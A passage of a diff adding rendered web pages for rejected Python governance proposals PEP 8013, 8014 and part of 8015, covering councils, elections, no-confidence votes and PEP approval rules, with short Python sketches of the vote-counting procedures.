+

The intended balance of power is that the core developers will elect +members of the CoA who reflect the direction and have the trust of the +development team, and also have the ability to remove members who do +not honour commitments made prior to election.

+
+
+

Regular decision process

+

Regular decisions continue to be made as at present.

+

For the sake of clarity, controversial decisions require a PEP, and any decisions requiring a PEP are considered controversial.

+

The CoA may be asked to advise on whether a decision would be better +made using the controversial decision process, or individual members +of the CoA may volunteer such a suggestion, but the core development +team is not bound by this advice.

+
+
+

Controversial decision process

+

Controversial decisions are always written up as PEPs, following the +existing process. The approver (formerly “BDFL-Delegate”) is always +the CoA, and can no longer be delegated. Note that this does not +prevent the CoA from deciding to nominate a core developer to assess +the proposal and provide the CoA with a recommendation, which is +essentially the same as the current delegation process.

+

The CoA will pronounce on PEPs submitted to python-committers with a +request for pronouncement. Any member of the CoA, or the current RM, +may request changes to a PEP for any reason, provided they include +some indication of what additional work is required to meet their +expectations. See later sections for examples of expected reasons.

+

When all members of the CoA and the RM indicate that they have no +concerns with a PEP, it is formally accepted. When one or more members +of the CoA fail to respond in a reasonable time, the President of the +CoA may choose to interpret that as implied approval. Failure of the +President to respond should be handled using a vote of no confidence.

+
+
+

Election terms

+

Members of the CoA are elected for the duration of a release. The +members are elected prior to feature freeze for the previous release, +and hold their position until feature freeze for their release.

+

Members may seek re-election as many times as they like. There are no +term limits. It is up to the core developers to prevent re-election of +the CoA members where there is consensus that the individual should +not serve again.

+
+
+

Election voting process

+

The election process for each member of the CoA proceeds as follows (a seat-allocation sketch in Python follows the list):

+
    +
  • a nomination email is sent to python-committers
  • +
  • a seconding email is sent
  • +
  • the nominee is temporarily added to python-committers for the +purpose of introducing themselves and presenting their position
  • +
  • voting opens two weeks prior to the scheduled feature freeze of the +previous release
  • +
  • votes are contributed by modifying a document in a private github +repository
  • +
  • each core developer may add +1 votes for as many candidates as they +like
  • +
  • after seven days, voting closes
  • +
  • the nominee with the most votes is elected as President of the CoA
  • +
  • the next three nominees with the most votes and also at least 50% of the number of votes received by the President are elected as the other members of the CoA
  • +
  • where ties need to be resolved, the RM may apply one extra vote for +their preferred candidates
  • +
  • accepted nominees remain on python-committers; others are removed
  • +
+
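A hedged sketch of the seat-allocation rule above (the data is illustrative, and the RM’s tie-breaking extra vote is not modelled):

    # Hypothetical sketch: allocating CoA seats from +1 vote counts.
    def allocate_coa_seats(votes):
        # votes maps nominee -> number of +1 votes received.
        ranked = sorted(votes, key=votes.get, reverse=True)
        president = ranked[0]
        threshold = votes[president] / 2
        # The next three nominees by vote count are elected only if
        # they also reach at least 50% of the President's total.
        members = [n for n in ranked[1:4] if votes[n] >= threshold]
        return president, members

    # Example: Alice (30 votes) becomes President; Bob (20) clears the
    # 15-vote threshold, while Carol (14) and Dave (12) do not.
    print(allocate_coa_seats({"Alice": 30, "Bob": 20,
                              "Carol": 14, "Dave": 12}))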
+
+

No-confidence voting process

+

A vote of no confidence proceeds as follows:

+
    +
  • a vote of no confidence email is sent to python-committers, naming +the affected member of the CoA, justifying the nomination, and +optionally listing accepted PEPs that the nominator believes should +be reverted
  • +
  • a seconding email is sent within seven days
  • +
  • the nominated member of the CoA is allowed seven days to respond, +after which the nominator or the seconder may withdraw
  • +
  • if no nominator or seconder is available, no further action is +taken
  • +
  • voting opens immediately
  • +
  • each core developer may add a +1 vote (remove the CoA member) or +a -1 vote (keep the CoA member) by modifying a document in a +private github repository
  • +
  • after seven days, voting closes
  • +
  • if +1 votes exceed -1 votes, the CoA member is removed from +python-committers and any nominated PEPs are reverted
  • +
  • if requested by the remaining members of the CoA, or if only one +member of the CoA remains, a new election to replace the removed +member may be held following the usual process.
  • +
  • in the case of removing the President of the CoA, the candidate +who originally received the second-most votes becomes President
  • +
+
+
+
+

Examples of intended behaviour

+

This section describes some examples of the kind of interactions that +we hope to see between the CoA and the core developers. None of these +are binding descriptions, but are intended to achieve some consensus +on the types of processes we expect. The CoA candidates may campaign +on the basis of whatever process they prefer, and core developers +should allocate votes on this basis.

+
+

Scenario 1 - The Case of the Vague PEP

+

Often in the past, initial proposals have lacked sufficient detail to +be implementable by anyone other than the proposer. To avoid this, +the CoA should read proposals “fresh” when submitted, and without +inferring or using any implied context. Then, when an aspect of a PEP +is not clear, the CoA can reject the proposal and request +clarifications.

+

Since the proposal is rejected, it must be modified and resubmitted in +order to be reviewed again. The CoA will determine how much guidance +to provide when rejecting the PEP, as that will affect how many times +it will likely be resubmitted (and hence affect the CoA’s own +workload). This ensures that the final PEP text stands alone with all +required information.

+
+
+

Scenario 2 - The Case of the Endless Discussion

+

From time to time, a discussion between Python contributors may seem +to be no longer providing value. For example, when a large number of +emails are repeating points that have already been dealt with, or are +actively hostile towards others, there is no point continuing the +“discussion”.

+

When such a discussion is occurring on python-committers as part of a +request for pronouncement, a member of the CoA should simply declare +the thread over by rejecting the proposal. In most known cases, +discussion of this sort indicates that not all concerns have been +sufficiently addressed in the proposal and the author may need to +enhance some sections.

+

Alternatively, and in the absence of any rejection from the other +members of the CoA, the President may declare the thread over by +accepting the proposal. Ideally this would occur after directly +confirming with the rest of the CoA and the RM that there are no +concerns among them.

+

When such a discussion is occurring on another list, members of the +CoA should be viewed as respected voices similar to other core +developers (particularly those core developers who are the named +experts for the subject area). While none have specific authority to +end a thread, preemptively stating an intent to block a proposal is a +useful way to defuse potentially useless discussions. Members of the +CoA who voluntarily follow discussions other than on python-committers +are allowed to suggest the proposer withdraw, but can only actually +approve or reject a proposal that is formally submitted for +pronouncement.

+
+
+

Scenario 3 - The Case of the Unconsidered Users

+

In the past, some proposals may have been written up and submitted for pronouncement without considering the impact on particular groups of users. For example, a proposal that affects the dependencies required to use Python on various machines may have an adverse impact on some users, even if many are unaffected due to the dependencies being typically available by default.

+

Where a proposal does not appear to consider all users, the CoA might choose to use their judgement and past experience to determine that more users are affected by the change than described in the PEP, and request that the PEP also address these users. They should identify the group of users clearly enough that the proposer is able to also identify these users, and either clarify how they were addressed, or make amendments to the PEP to explicitly address them. (Note that this does not involve evaluating the usefulness of the feature to various user groups, but simply whether the PEP indicates that the usefulness of the feature has been evaluated.)

+

Where a proposal appears to have used flawed logic or incorrect data +to come to a certain conclusion, the CoA might choose to use other +sources of information (such as the prior discussion or a submission +from other core developers) to request reconsideration of certain +points. The proposer does not necessarily need to use the exact +information obtained by the CoA to update their proposal, provided +that whatever amendments they make are satisfactory to the CoA. For +example, a PEP may indicate that 30% of users would be affected, while +the CoA may argue that 70% of users are affected. A successful +amendment may include a different but more reliable percentage, or may +be rewritten to no longer depend on the number of affected users.

+
+
+

Scenario 4 - The Case of the Delegated Decision

+

Some proposals may require review and approval from a specialist in the area. Historically, these would have been handled by appointing a BDFL-Delegate to make the final decision on the proposal. However, in this model, the CoA may not delegate the final decision making process. When the CoA believes that a subject matter expert should decide on a particular proposal, the CoA may nominate one or more individuals (or accept their self-nomination) to a position similar to a BDFL-Delegate. The terms of these experts’ roles may be set as the CoA sees fit, though the CoA always retains the final approval.

+

As a concrete example, assume a proposal is being discussed about a +new language feature. Proponents claim that it will make the language +easier for new developers to learn. Even before an official proposal +is made, the CoA may indicate that they will not accept the proposal +unless person X approves, since person X has a long history teaching +Python and their judgement is trusted. (Note that person X need not be +a core developer.)

+

Having been given this role, person X is able to drive the discussion +and quickly focus it on viable alternatives. Eventually, person X +chooses the alternative they are most satisfied with and indicates to +the CoA that they approve. The proposal is submitted as usual, and the +CoA reviews and accepts it, factoring in person X’s opinion.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-8013.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
diff --git a/pep-8014/index.html b/pep-8014/index.html new file mode 100644 index 00000000000..b087c9da603 --- /dev/null +++ b/pep-8014/index.html @@ -0,0 +1,411 @@ PEP 8014 – The Commons Governance Model | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 8014 – The Commons Governance Model

+
+
Author:
+
Jack Jansen
+
Status:
+
Rejected
+
Type:
+
Informational
+
Topic:
+
Governance
+
Created:
+
16-Sep-2018
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a governance model with as few procedures, defined terms and +percentages as possible. It may also be called The Anarchist Governance Model +but uses Commons for now because of possible negative connotations of the +term Anarchist to some audiences.

+

The basic idea is that all decisions are in principle voted on by the whole community, but in practice voted on by only a subset of the community. A subset, because although the whole community is entitled to vote, in practice it will always be only a small subset that votes on a specific decision. The vote is overseen by an impartial council that judges whether the decision has passed or not. The intention is that this council bases its decision not only on the ratio of yes and no votes but also on the total number of votes, on the gravity of the proposal being voted on, and possibly on the individual voters and how they voted. Thereby this council becomes responsible for ensuring that each individual decision is carried by a sufficient majority.

+
+
+

PEP Rejection

+

PEP 8014 was rejected by a core developer vote +described in PEP 8001 on Monday, December 17, 2018.

+

PEP 8016 and the governance model it describes were chosen instead.

+
+
+

Introduction

+

The Commons Governance Model tries to ensure that all decisions are endorsed by, or at least acceptable to, a sufficient majority of the Python community.

+

Unfortunately the previous paragraph has two terms that are very hard to quantify in the general case: sufficient majority and Python community. This is because both terms in reality depend on the specific case that is being decided. To give an example of this difficulty: for a PEP that proposes a backward-compatible change to some API, a simple majority of the core developers that were interested in voting on the PEP in the first place is probably sufficient. But for a change that has more far-reaching consequences, such as a Python3 to Python4 transition, a real majority may be wanted, and a demonstration that at least there seems to be sufficient support in the user base. And for a change that transcends Python-the-language, such as decisions on abolishing non-inclusive language, it becomes very vague.

+

The Commons Governance Model attempts to sidestep this issue by not +defining what the terms sufficient majority and Python community mean in +the general case, by proposing a body that will decide so in specific +cases.

+

The model proposes creating a Council of Elders that oversees the decision +process, determining whether a specific proposal has enough support on a +case-by-case basis. There will be a vote on every individual PEP, +and the Council of Elders will declare whether the +outcome of the vote is sufficient to carry the decision in this specific case.

+

The model addresses only the roles traditionally held by the BDFL in the +decision process, not other roles.

+

The term Commons in the model name is loosely based on its historic use as +a shared resource to be used by all and cared for by all. The picture you +should have in mind with this model is a sizeable group of peasants +discussing some plan for the future on the village green on a warm summer +evening, after which the vote is taken and the village elders pronounce +the outcome. Then the banquet begins.

+

The Commons Governance Model is different from most of the other governance +proposals (with the possible exception of 8012), because it explicitly places +supreme power with the whole community.

+
+
+

Rationale

+

The rationale for the model is that a model that casts everything in concrete will +have unintended negative side effects. For example, a governance model that +assigns voting rights to Python committers may cause an individual not +to be accepted as a committer because there are already a lot of committers +from the company the new candidate works for.

+

As another example, setting a fixed percentage for PEP acceptance may lead to party-formation amongst the voters, and individual PEPs no longer being judged on individual merit but along party lines (if you support my PEP I will support yours).

+

There is also the issue that one-person-one-vote is not the best model for +something like Python. Again an example: in case of a split vote (or a vote +sufficiently close to being split) the opinion of core developer Guido +van Rossum should probably outweigh the opinion of core developer Jack +Jansen. Trying to formalize this in a voting model is going to lead to a +very complex model, that is going to be wrong on boundary cases anyway. The +model presented here leaves deciding on such issues to the (hopefully +sensible) council of elders.

+
+
+

Decision Process

+

All important decisions go through a PEP process. Each PEP has someone +responsible for it, called the author here, but that does not have to be a +single person, and it does not have to be the person that actually wrote the +text. So for author you could also read champion or shepherd or +something like that.

+

The PEP author is responsible for organizing a vote on the PEP. This vote is public, i.e. the voters are identified and the results are known to all. Voting may be simple +1/0/-1, but might also be extended with +2/-2 accompanied by a very terse explanation of why the voter feels very strongly about the issue. Such an annotation would serve as an explanation to the Council of Elders. Voters are annotated with their community status (core developer, etc.).

+
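As a hedged illustration of such an annotated ballot (this data structure is purely hypothetical; the PEP prescribes no format):

    # Hypothetical sketch of one annotated, public ballot.
    from dataclasses import dataclass

    @dataclass
    class Ballot:
        voter: str
        status: str          # community status, e.g. "core developer"
        value: int           # one of -2, -1, 0, +1, +2
        rationale: str = ""  # terse explanation, expected for +2/-2

        def __post_init__(self):
            if self.value not in (-2, -1, 0, 1, 2):
                raise ValueError("invalid vote value")
            if abs(self.value) == 2 and not self.rationale:
                raise ValueError("a +2/-2 vote needs a terse rationale")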

The vote is clearly separated from the discussion, by using a well-defined Discourse +category or tag, a special mailing list or a similar technical method +(such as a website vote.python.org where people have to log in so their +community status can be automatically added, and their identity can be somewhat +confirmed).

+

The PEP author presents the PEP and the vote results to the Council of Elders. +The council ponders two things:

+
    +
  • the PEP gravity and its implications,
  • +
  • the measurable vote results (how many people voted, which individuals voted, what they voted).
  • +
+

They pronounce a tentative decision on whether the vote passed and this decision is published.

+

If the decision is that the vote results do not demonstrate enough support from the community for the decision, the burden is on the author to try and gather more support and resubmit the vote at a later date. Alternatively the author can retract the proposal. The period for gathering more support is time-limited (a month seems a reasonable time); if no vote has been resubmitted after that period the proposal is rejected.

+

If the tentative decision is that the results do demonstrate enough support +a fairly short waiting period starts (in the order of weeks). During this +period anyone can appeal to the Council of Elders, but only on the grounds +that the vote does not reflect a sufficient majority of the community. +After the waiting period the council pronounces a final decision. The PEP +is either accepted or, if the council is swayed by an appeal, goes back to +the state where more support has to be demonstrated.

+
+
+

Council of Elders

+

The intention of the Council of Elders is that they, together, are capable +of judging whether the will of the Python community is upheld in a specific +vote.

+

The Council of Elders is not a replacement of the BDFL by a group of +people with the same power as the BDFL: it will not provide guidance on the +direction of Python, it only attempts to ensure the outcome of a vote +represents the will of the community.

+

The Council of Elders is not like the US Supreme Court, which has actual +decision power, the council only oversees the voting process to ensure that +the community is represented in the vote. And the Council of Elders is most +definitely not like the Spanish Inquisition, because fear, surprise and +ruthless efficiency are things we can do without (but there is some merit in +using the cute scarlet regalia).

+

The council is somewhat like the Dutch +Hoge Raad (which is unfortunately often translated as Supreme Court in +English) in that they judge the process and the procedures followed and can +only send cases back for a renewed judgement.

+

It is also somewhat like the election commission that many countries have +(under different names) in that it oversees elections.

+
+

Council operation

+

The council members are volunteers, and most likely have other roles within the Python community as well (not to mention a life outside Python). This means that the workload on the members should be kept to a minimum. It also means that it should be clear when individual council members speak as council members and when they speak as themselves. And we should care about the emotional load: council members should not be held accountable for decisions by random flamers on the Python mailing list.

+

The proposal attempts to minimize the workload through two methods:

+
    +
  • Most of the actual work is to be done by the PEP author and the community; the Council of Elders does not organize the vote or tally the results.
  • +
  • The idea behind the first tentative decision is that mistakes by the Council of Elders (misjudging how far-reaching a PEP is, most likely) are not fatal, because the community has a chance to point out these mistakes.

    Practically speaking, this means that the tentative decision can be taken by a subset of the council, relying on the community to correct them. Getting seven hard-working professionals together every two weeks, even by email, may be a bit much to ask.

    +
  • +
+

Clarifying when an individual Elder speaks on behalf of the Council is +probably best done by using a special email address, or some Discourse topic +into which only Elders can post. There is an analogy here with the Pope +speaking Ex Cathedra or just as himself (in which case he is not +infallible). The elders are most likely respected members of the community +and it would be a bad idea if they feel they cannot voice their personal opinion on +a PEP because they are on the council.

+

Discussion of community members with the Council of Elders, i.e. when appealing a +decision, should be done in a different forum (Discourse topic, mailing list).

+

The decisions of the Council of Elders should be seen as decisions of the +council as a whole, not as decisions of the individual members. In a first implementation +Elders should post under their own name (with the fact that they speak as a +council member conferred by the topic they post to, or possibly a special badge). +If it turns out that Elders become individual targets for ad-hominem attacks +we should revisit this and come up with some method of anonymity.

+
+
+

Limitation of freedom

+

If a specific vote has a true majority (for or against) of core team members +(more than 50% + 1 of all core team members) that outcome passes. If a specific +vote has a true majority (for or against) of PSF voting members +(more than 50% + 1) that outcome passes. And, for completeness, if both of the +previous statements are true but with opposite outcomes the core team members +win.

+
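A hedged sketch of this override rule, reading a “true majority” as more than half of all members of the group, with the core team outcome checked first so that it wins on a conflict:

    # Hypothetical sketch of the "limitation of freedom" rule.
    def overriding_outcome(core_for, core_against, core_total,
                           psf_for, psf_against, psf_total):
        def true_majority(n, total):
            return 2 * n > total
        # Core team true majorities are checked first, so on
        # conflicting outcomes the core team members win.
        if true_majority(core_for, core_total):
            return "passes"
        if true_majority(core_against, core_total):
            return "fails"
        if true_majority(psf_for, psf_total):
            return "passes"
        if true_majority(psf_against, psf_total):
            return "fails"
        return None  # no true majority: the Council of Elders decides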

The main reason for having this limitation is that it allows decisions to be +made (albeit with effort) if there is no functioning Council of Elders at +any particular moment.

+
+
+

Council composition

+

The council should be neither too big nor too small, probably somewhere between 5 and 10 members. There is no reason to fix this number. The members should be knowledgeable about Python and the Python community, and willing to be impartial while operating as part of the council. Council members may be core developers but this is not a requirement.

+

Everyone in the community should feel represented by the council so it would +be good if the council is diverse:

+
    +
  • scientists and technologists,
  • +
  • progressives and conservatives (with respect to the Python language),
  • +
  • people with different cultural backgrounds, genders, age,
  • +
  • etc
  • +
+

But: this should hold for the council as a whole. Individual council members +should not be seen as representing a specific interest group.

+
+
+

Council membership

+

Because the powers of the council are purely procedural, it is probably good if members serve for a fairly long time. However, it would still be good if the council were reinstated regularly. Therefore, the suggestion is to have the council operate under the PSF umbrella and be subject to a yearly vote of confidence. This vote is for the council as a whole: people who vote against the council should be aware that they are basically saying “Python is better off without a Council of Elders than with you lot”.

+

The council normally co-opts new Elders, probably because an individual is seen +to have knowledge about a specific part of the Python community (or language) in which +the council is lacking. Everyone is free to suggest new Elders to the council +(including themselves) but the council is free to ignore the suggestion. +Council members should be free to retire at any time. An individual council +member can be retired by a unanimous vote by the rest of the council.

+

There is an emergency brake procedure to get rid of a non-functioning council. A single Elder, or a group of 10 core developers or PSF voting members, can ask for an immediate reinstating vote of the council as a whole (presumably with the intention that the council lose their mandate). If this vote has been requested by an Elder, that individual immediately loses their council position, independent of the outcome of the vote. If the vote has been requested by community members and the council is reinstated, this procedure cannot be invoked again for a year.

+

If there is no functioning council (the current initial situation, or after the council has lost its mandate after a vote of no confidence) an initial council must be selected. Through the normal communication channels (Discourse, mailing lists) members can be suggested by anyone (including themselves). After discussion amongst the nominees and in the whole community, a group of at least three individuals should emerge that asks for an initial vote to instate them as Council of Elders. The intention of this procedure is that by the time such a group of individuals emerges and asks for a vote of confidence, they expect an overwhelming mandate.

+
+
+
+

Discussion

+

This PEP does not handle other roles of the BDFL, only the voting process. +Most importantly, the direction of Python in the long term is not expected +to be handled by the Council of Elders. This falls to the community as a whole +(or to individual members of the community, most likely).

+

There is also the role of figurehead or spokesperson to represent Python and +the Python community to the outside world. Again, this is not a role that +should be handled by the Council of Elders, in my opinion, but by some +other person or body.

+

Note that this proposal most likely favors conservatism over progression. Or, at least, the +danger of it leading to stagnation is bigger than the danger of it leading +to reckless blazing ahead into unknown territories. So: we should realise +that it is unlikely that a PEP like PEP 572 will pass if this model is in +place.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-8014.rst

+

Last modified: 2024-08-20 10:29:32 GMT

+ +
+ +
diff --git a/pep-8015/index.html b/pep-8015/index.html new file mode 100644 index 00000000000..568260d92a0 --- /dev/null +++ b/pep-8015/index.html @@ -0,0 +1,768 @@ PEP 8015 – Organization of the Python community | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 8015 – Organization of the Python community

+
+
Author:
+
Victor Stinner
+
Status:
+
Rejected
+
Type:
+
Informational
+
Topic:
+
Governance
+
Created:
+
04-Oct-2018
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP formalizes the current organization of the Python community and +proposes 3 main changes:

+
    +
  • Formalize the existing concept of “Python teams”;
  • +
  • Give more autonomy to Python teams;
  • +
  • Replace the BDFL (Guido van Rossum) with a new “Python Steering Committee” of 5 members, which has limited roles: basically, it decides how decisions are taken, but does not take decisions itself.
  • +
+

PEPs are approved by a PEP delegate or by a vote (reserved to core developers; requires a >= 2/3 majority).

+
+
+

PEP Rejection

+

PEP 8015 was rejected by a core developer vote +described in PEP 8001 on Monday, December 17, 2018.

+

PEP 8016 and the governance model it describes were chosen instead.

+
+
+

Rationale

+

This PEP describes the organization of the whole Python development +community, from Python users to the Python Steering Committee. +Describing all groups and all roles in the same document helps to make +the organization more consistent.

+

The number of governance changes is minimized to get a smooth transition +from the old BDFL organization to the new Steering Committee +organization.

+

One key design of the organization is to avoid decision bottlenecks. +Discussions and decisions are distributed into Python teams where +experts in each topic can be found. The expectation is smoother +discussions on PEPs: fewer people with better knowledge of the topic.

+

Previously, most decisions have been taken by the Benevolent +Dictator For Life (BDFL), Guido van Rossum. The growing popularity of +Python increased the pressure on a single person. The proposed +organization distributes decisions and responsibilities to reduce the +pressure and avoid wearing any individual down.

+

To keep most of the decision power within the hands of the community, +the Python Steering Committee has very limited roles. The idea is to reduce the risk +that a group of people or companies “takes over” the Python project +through just a couple individuals. The project must remain autonomous +and open to everybody.

+

The most sensitive PEPs are decided by democracy: a vote reserved to core developers; see the PEP process section below for the voting method.

+
+
+

Common Guidelines

+
    +
  • The Python community is open to everyone.
  • +
  • Members must respect the Python Community Code of Conduct which ensures that +discussions remain constructive and that everybody feels welcomed.
  • +
  • Python is and will remain an autonomous project.
  • +
  • People with decision power should reflect the diversity of Python’s users and contributors.
  • +
+
+
+

Community Organization

+

Right now, there are different groups of people involved in the Python project. The more involved you are, the more decision power you get. It is important that the people acceding to the deepest group are the most trusted ones.

+

This PEP formalizes the following groups:

+
    +
  • Python Users
  • +
  • Python Contributors
  • +
  • Python Teams Members
  • +
  • Python Core Developers
  • +
  • Python Steering Committee Members
  • +
  • PSF Code of Conduct Workgroup
  • +
+
+
+

Python Users

+

This is the largest group: anyone who uses Python.

+
+
+

Python Contributors

+

Once a Python user sends an email to a Python mailing list, comments on the Python bug tracker, or proposes or reviews a Python change, they become a Python contributor.

+
+
+

Python Teams

+

Python became too big to work as a single team anymore; people have naturally grouped themselves into teams to work more closely on specific topics, sometimes called “Special Interest Groups” (SIGs).

+

When enough developers are interested in a specific topic, they can create a new team. Usually, the main action is to ask the Python postmaster to create a new “SIG” mailing list, but the team can choose to use a different communication channel.

+

Team members are Python contributors and Python core developers. The team is self-organized and is responsible for selecting who can join the team and how.

+

Team members can get the bug triage permission on the team bug tracker component. The more involved in a team you are, the more decision power and responsibilities you get.

+

A team might become allowed to decide on their own PEPs, but only the Python Steering Committee can allow that (and it has the power to revoke it as well). Such a case is exceptional; currently a single team has such permission: the Packaging Team.

+

See Annex: Examples of Python Teams.

+
+
+

Python Core Developers

+

One restricted definition of a core developer is the ability to merge a +change (anywhere in the code) and have the bug triage permission +(on all bug tracker components).

+

Core developers are developers who have proven they have the skills required to decide whether a change can be approved or must be rejected, but also (and more importantly) which changes should not be made at all. Python has a long history, strong backward compatibility constraints, and high quality standards (e.g. changes require new tests). For these reasons, becoming a core developer can take several months or longer.

+

Becoming a core developer means more responsibilities. For example, if a +developer merges a change, they become responsible for regressions and +for the maintenance of that modified code.

+

Core developers are expected to be exemplary when it comes to the Code +of Conduct. They are encouraged to mentor contributors.

+
+

Promote a contributor as core developer

+

Once an existing core developer considers that a contributor is ready to join the core group, they ask the contributor whether they would like to become a core developer. If the contributor is interested in these new responsibilities, a vote is organized.

+

The vote is reserved to core developers, is public, and is open for 1 week. Usually the core developer who proposes the promotion describes the candidate's work and skills in the vote description. A contributor is only promoted if two thirds (>= 2/3) of votes approve ("+1") the promotion. Only "+1" and "-1" votes are counted; other votes (e.g. null, "-0", "+0.5") are ignored.
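To make the counting rule concrete, here is a minimal sketch in Python (not part of the PEP; the function name and ballot encoding are illustrative assumptions):

    def promotion_passes(ballots):
        # Only "+1" and "-1" ballots are counted; anything else
        # (null, "-0", "+0.5", ...) is ignored.
        plus = sum(1 for b in ballots if b == "+1")
        minus = sum(1 for b in ballots if b == "-1")
        counted = plus + minus
        # Promotion requires approval by at least two thirds of the
        # counted ballots.
        return counted > 0 and plus * 3 >= counted * 2

    # Example: 8 approvals, 3 rejections, 2 ignored ballots (8/11 >= 2/3).
    print(promotion_passes(["+1"] * 8 + ["-1"] * 3 + ["+0.5", "-0"]))  # True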

+

If the candidate is promoted, usually they get a mentor for 1 month to help them handle their new responsibilities.

+

If the candidate is not promoted, a new vote can be organized later, once the candidate has acquired the missing skills, for example 6 months later.

+
+
+
+

Python Steering Committee

+

The Python Steering Committee is made of the most trusted core +developers since it has the most decision power. The roles of this group +are strictly limited to ensure that Python keeps its autonomy and +remains open.

+

The Python Steering Committee is composed of 5 members. They are elected +for 3 years and 1/3 is replaced every year (first year: 1, second year: +2, third year: 2). This way, a member will stay for one full Python +release and the committee composition will be updated frequently. A +committee member can be a candidate for the seat they are leaving. +There are no term limits.

+

Committee members must be Python core developers. It is important that the members of the committee reflect the diversity of Python's users and contributors. A small step to ensure that is to enforce that at most 2 members (strictly less than 50% of the 5 members) can work for the same employer (same company or subsidiaries of the same company).

+

The size of 5 members was chosen for member diversity and to ensure that the committee can continue to work even if a member becomes unavailable for an unknown duration.

+
+

Python Steering Committee Roles

+

Python Steering Committee roles:

+
    +
  • Decide how a PEP is approved (or rejected or deferred).
  • +
  • Grant or revoke permissions to a Python team. For example, allow +a team to give the bug triage permission (on the team component) to a +contributor.
  • +
+

To decide how a PEP is approved (or rejected or deferred), there are two +options:

+
    +
  • The committee elects a PEP delegate (previously known as "BDFL-delegate"): a core developer who will take the final decision on the specific PEP. The committee selects the PEP delegate, who can be proposed by the Python team where the PEP is discussed.
  • +
  • The committee can organize a vote on the PEP; see the PEP process section for the vote organization. The committee decides when the vote is organized. A vote is preferred for changes affecting all Python users, like language changes.
  • +
+

The committee keeps the "vision" and consistency of Python. It also makes sure that important features reach completion. Its ability to pick PEP delegates is meant to help it achieve that goal.

+
+
+

Election of Python Steering Committee Members

+

The vote is organized by the Steering Committee. It is announced 3 weeks in advance: candidates have to apply during this period. The vote is reserved to core developers and is open for 1 week. To avoid self-censorship, the vote uses secret ballots: this avoids the risk of hostility from someone who may gain more power (if they are elected).

+

The vote uses the Schulze/Beatpath/CSSD variant of the Condorcet method, using an online service like the Condorcet Internet Voting Service (CIVS). This voting method reduces the risk of a tie. It also produces a ranking of all candidates, needed for the creation of the committee.
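The election itself is run on an external service such as CIVS rather than any in-house code, but for illustration, a minimal sketch of the Schulze/Beatpath computation could look like the following (the data shapes are assumptions, and the final sort is a simplification of the full Schulze ranking):

    def schulze_order(candidates, ballots):
        # d[a][b]: number of voters who strictly prefer a to b.
        # Each ballot is a list of candidates, most preferred first.
        d = {a: {b: 0 for b in candidates} for a in candidates}
        for ballot in ballots:
            for i, a in enumerate(ballot):
                for b in ballot[i + 1:]:
                    d[a][b] += 1
        # p[a][b]: strength of the strongest path ("beatpath") from a to b.
        p = {a: {b: d[a][b] if d[a][b] > d[b][a] else 0
                 for b in candidates} for a in candidates}
        for c in candidates:  # Floyd-Warshall style relaxation
            for a in candidates:
                for b in candidates:
                    if a != b != c != a:
                        p[a][b] = max(p[a][b], min(p[a][c], p[c][b]))
        # A candidate ranks higher the more rivals it beats path-wise,
        # which yields both a winner and a full candidate ranking.
        wins = {a: sum(p[a][b] >= p[b][a] for b in candidates if b != a)
                for a in candidates}
        return sorted(candidates, key=lambda a: wins[a], reverse=True)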

+

In case of a tie, a new vote is organized immediately between the candidates involved in the tie, using the same voting method and also open for 1 week. If the second vote again leads to a tie, the current Steering Committee is responsible for selecting the elected member(s).

+

If a committee member steps down, a new vote is organized to replace +them.

+

If the situation of a committee member changes in a way that no longer satisfies the committee constraint (e.g. they move to the same company as two other committee members), they have to resign. If the employer of a member is acquired by the employer of two other members, the member with the mandate ending earlier has to resign once the acquisition completes.

+
+
+

Election Creating the Python Steering Committee

+

To bootstrap the process, 5 members are elected at the committee's creation. The vote follows the same rules as regular committee votes, except that the election needs to fill 5 seats, and the vote is organized by the PSF Board.

+

In a council election, if 3 of the top 5 vote-getters work for the +same employer, then whichever of them ranked lowest is disqualified +and the 6th-ranking candidate moves up into 5th place; this is +repeated until a valid council is formed.
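For illustration only (the function and data shapes are assumptions, not part of the PEP), the disqualification rule could be implemented along these lines:

    def form_council(ranked, employer, size=5, limit=2):
        # ranked: full vote result, best first; employer: name -> employer.
        council = list(ranked[:size])
        pool = list(ranked[size:])
        while pool:
            counts = {}
            for member in council:
                counts[employer[member]] = counts.get(employer[member], 0) + 1
            over = {e for e, n in counts.items() if n > limit}
            if not over:
                break
            # Disqualify the lowest-ranked member working for an
            # over-represented employer, then promote the next candidate.
            for member in reversed(council):
                if employer[member] in over:
                    council.remove(member)
                    council.append(pool.pop(0))
                    break
        return council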

+

In case of a tie, a second vote is organized immediately between the candidates involved in the tie and the following candidates, to fill the remaining seats. The vote follows the same rules as the regular committee vote. If the second vote still results in a tie, the PSF Board is responsible for electing members and deciding their position in the vote result.

+

The order in the vote result must be unique for elected members: #1 and #2 are elected for 3 years, #3 and #4 for 2 years, and #5 for 1 year.

+

Example of vote result with a tie:

+
    +
  • A
  • +
  • B
  • +
  • C
  • +
  • D
  • +
  • E, F
  • +
  • G
  • +
  • +
+

The first 4 candidates (A, B, C and D) are elected immediately. If E works for the same employer as two other elected members, F is elected instead. Otherwise, a second vote is organized for the 5th seat between E and F.

+
+
+

Special Case: Steering Committee Members And PEPs

+

A committee member can be a PEP delegate.

+

A committee member can propose a PEP, but cannot be the PEP delegate of +their own PEP.

+

When the committee decides that a PEP must be voted on, committee members can vote since they are also core developers, but they have no more power than any other core developer.

+
+
+
+

PSF Code of Conduct Workgroup

+
+

Charter

+

The workgroup’s purpose is to foster a diverse and inclusive Python +community by enforcing the PSF code of conduct, along with providing +guidance and recommendations to the Python community on codes of +conduct, that supports the PSF mission of “ongoing development of +Python-related technology and educational resources”.

+

We work toward this common goal in three ways:

+
    +
  • Review, revise, and advise on policies relating to the PSF code of conduct and other communities that the PSF supports. This includes any #python chat community & python.org email list under PSF jurisdiction.
  • +
  • Create a standard set of codes of conduct and supporting documents for +multiple channels of interaction such as, but not limited to, +conferences, mailing lists, slack/IRC, code repositories, and more.
  • +
  • Develop training materials and other processes to support Python +community organizers in implementing and enforcing the code of +conduct.
  • +
+

The organization of this workgroup is defined by the +ConductWG Charter.

+
+
+

Special Case: Ban a core developer

+

